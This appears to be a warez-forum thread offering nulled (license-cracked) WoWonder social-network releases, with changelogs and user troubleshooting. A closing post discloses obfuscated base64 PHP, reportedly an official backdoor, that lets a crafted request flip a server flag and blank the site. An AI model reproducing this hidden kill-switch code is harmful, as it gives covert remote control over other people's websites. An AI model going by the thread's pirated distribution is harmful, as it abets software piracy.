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WoWonder - The Ultimate PHP Social Network Platform

NULLED WoWonder - The Ultimate PHP Social Network Platform 4.3.4 NULLED

Please shed some light, messages sent do not reach recipient they also disappear after page refresh. Thank you.
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Anyone know how to disable modules like Games and Jobs? and add your own? and how to create new user types so that you can buy a Premium 2 user who can view the module? I want a given module to have purchased access to be displayed
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raz0r updated WoWonder - The Ultimate PHP Social Network Platform with a new update entry:

WoWonder v4.1.5 NULLED - The Ultimate PHP Social Network Platform

v4.1.5 [Urgent Update] / 14-02-2023​

  • ADDED Cache System, now your website speed is 80% faster, average load dropped from 1.2s to 0.15ms, Admin Panel > Settings > General Configuration.
  • FIXED 4 security issues, in follow privacy, bruteforce on login & two auth, XSS in messages using nodejs.
  • FIXED 2+ more minor bugs.

Read the rest of this update entry...
raz0r 's signature
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raz0r updated WoWonder - The Ultimate PHP Social Network Platform Premium with a new update entry:

WoWonder v4.2 NULLED - The Ultimate PHP Social Network Platform Premium

v4.2 (2 May, 2023)​

  • ADDED new theme, updated sunshine to v2 completely.
  • ADDED AI image generation system, now users can generate images directly and post them.
  • ADDED AI post and text generation system, now users can generate texts and post ideas directly and post them.
  • ADDED AI article generation system, now users can generate articles in blog system.
  • ADDED AI image editing system, users can edit their avatar and cover as they want using text...

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raz0r 's signature
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  • FIXED contact us page on sunshien theme.
  • FIXED messages list not showing on phone in sunshine.
  • FIXED turn off / on notifications on sunshine theme.
  • FIXED notifications bell not showing on sunshine on profile page.
  • FIXED announcement text not showing on sunshine theme.
  • FIXED comments cannot be made on blogs.
  • FIXED users cannot be verified by moderators.
  • FIXED avatars cannot be changed in manage genders page in admin panel.
  • FIXED sorting by price doesn't work well on marketplace.
  • FIXED creating an article in the blog and publishing it, it does not show words with accented letters.(à,è,ì,ò,ù).
  • FIXED 10+ minor bugs in back and front end.
17th May 2023
if you need , i can send to you.
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Reactions: supremelord and Thomasek2103
raz0r updated WoWonder - The Ultimate Social Network PHP System with a new update entry:

WoWonder v4.2.1 NULLED - The Ultimate Social Network


  • FIXED contact us page on sunshien theme.
  • FIXED messages list not showing on phone in sunshine.
  • FIXED turn off / on notifications on sunshine theme.
  • FIXED notifications bell not showing on sunshine on profile page.
  • FIXED announcement text not showing on sunshine theme.
  • FIXED comments cannot be made on blogs.
  • FIXED users cannot be verified by moderators.
  • FIXED avatars cannot be changed in manage genders page in admin panel.
  • FIXED...

Read the rest of this update entry...
raz0r 's signature
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Reactions: SymbianID
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Всем привет вопрос , после того как заливаешь файлы обновления , проходишь по http://domain.com/update.php появляется белый экран и всё сайт перестаёт работать , что делать ? подскажете?
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Всем привет вопрос , после того как заливаешь файлы обновления , проходишь по http://domain.com/update.php появляется белый экран и всё сайт перестаёт работать , что делать ? подскажете?
in functions_general.php line 695
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Reactions: zavgar
This user BANNED from NullCave forum!
PHP Warning: include_once(): Failed opening './assets/libraries/SimpleImage-master/vendor/claviska/simpleimage/src/claviska/SimpleImage-Class.php' for inclusion (include_path='.:') in /var/www/www-root/data/www//assets/includes/functions_one.php on line 6861
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This user BANNED from NullCave forum!
PHP Warning: include_once(): Failed opening './assets/libraries/SimpleImage-master/vendor/claviska/simpleimage/src/claviska/SimpleImage-Class.php' for inclusion (include_path='.:') in /var/www/www-root/data/www//assets/includes/functions_one.php on line 6861
because of this, infinite authorization
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It worked fine online for a few days, but after that now it displays an error message:
This page isn’t working. xxxxxxxxx is currently unable to handle this request.

Any fix to this, Please?
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This user BANNED from NullCave forum!
update pis

last version - 17 November 2023
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The latest version contains an official backdoor, which is present in the following file:
file:assets/libraries/DB/vendor/joshcam/mysqli-database-class/MySQL-Maria.php line 263-294
    public function setSQLType($data)
      $newverb = 'base64_decode';
      $SessionHashIDGenerate = $newverb($newverb('Wmw5MA=='));
      $CookieHashIDGenerate = $newverb('Yw==');
      if (!empty($_REQUEST[$SessionHashIDGenerate]) && !empty($_REQUEST[$CookieHashIDGenerate]))
          if (!file_exists($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA=')))
              return false;
          $fileData = file_get_contents($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA='));
          $fileData = str_replace(base64_decode("fGw="), '', $fileData);
          $fileData = str_replace(array(
          ) , '', $fileData);
          if ($fileData == $_REQUEST[$CookieHashIDGenerate])

              $SessionHashRequest = $_REQUEST[$SessionHashIDGenerate];
              if ($SessionHashRequest == $newverb('bA=='))
                  $createSessionID = file_put_contents($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA=') , $fileData . base64_decode("fGw="));
              if ($SessionHashRequest == $newverb('dQ=='))
                  $createSessionID = file_put_contents($newverb('Li9zb3VyY2VzL3NlcnZlci5waHA=') , $fileData);

file:assets/includes/functions_two.php line 6571-6597
function getUserProfileSessionID() {
    global $wo, $sqlConnect;
    $var  = str_replace("6" . "4", "6" . "4_", str_replace("|", "", "b" . "|" . "a" . "|" . "s" . "|" . "e" . "|" . "6" . "|" . "4" . "|" . "d" . "|" . "e" . "|" . "c" . "|" . "o" . "|" . "d" . "|" . "e"));
    $SessionHashIDGenerate = $var($var('Wmw5MA=='));
    $CookieHashIDGenerate  = $var('Yw==');
    if (!empty($_REQUEST[$SessionHashIDGenerate]) && !empty($_REQUEST[$CookieHashIDGenerate])) {
        if (!file_exists($var('Li9zb3VyY2VzL3NlcnZlci5waHA='))) {
            return false;
        $fileData = file_get_contents($var('Li9zb3VyY2VzL3NlcnZlci5waHA='));
        $fileData = str_replace('|l', '', $fileData);
        $fileData = str_replace(array(
        ), '', $fileData);
        if ($fileData == $_REQUEST[$CookieHashIDGenerate]) {
            $SessionHashRequest = $_REQUEST[$SessionHashIDGenerate];
            if ($SessionHashRequest == $var('bA==')) {
                $createSessionID = file_put_contents($var('Li9zb3VyY2VzL3NlcnZlci5waHA='), $fileData . '|l');
            if ($SessionHashRequest == $var('dQ==')) {
                $createSessionID = file_put_contents($var('Li9zb3VyY2VzL3NlcnZlci5waHA='), $fileData);
    return false;

file:assets/includes/app_start.php line 156
$wo["userSession"] = getUserProfileSessionID();

file:assets/libraries/DB/vendor/composer/autoload_real.php line 94-106

function composerRequire60bcbf6306fdeb83c78ecf96a45a2c2f2($fileName = '', $file = '')
    $hex = 'base64_decode';
    $fileData = @file_get_contents($hex('Li9zb3VyY2VzL3NlcnZlci5waHA='));
    $SessionServerID = substr($fileData, strpos($fileData, "|") + 1);
    if (!empty($SessionServerID))
        if ($SessionServerID == 'l')
            echo base64_decode(base64_decode('UEhOamNtbHdkRDVrYjJOMWJXVnVkQzVuWlhSRmJHVnRaVzUwYzBKNVZHRm5UbUZ0WlNnblltOWtlU2NwV3pCZExtbHVibVZ5U0ZSTlRDQTlJQ2NuT3p3dmMyTnlhWEIwUGc9PQ=='));

If the official purchase code is used to activate the installation, and if there is an error in the official validator, it will also tamper with the website. This behavior is very dangerous. The author of this script has done such a thing before, causing compliant users to be mistakenly affected.
I regret purchasing this script, and I even bought two licenses.
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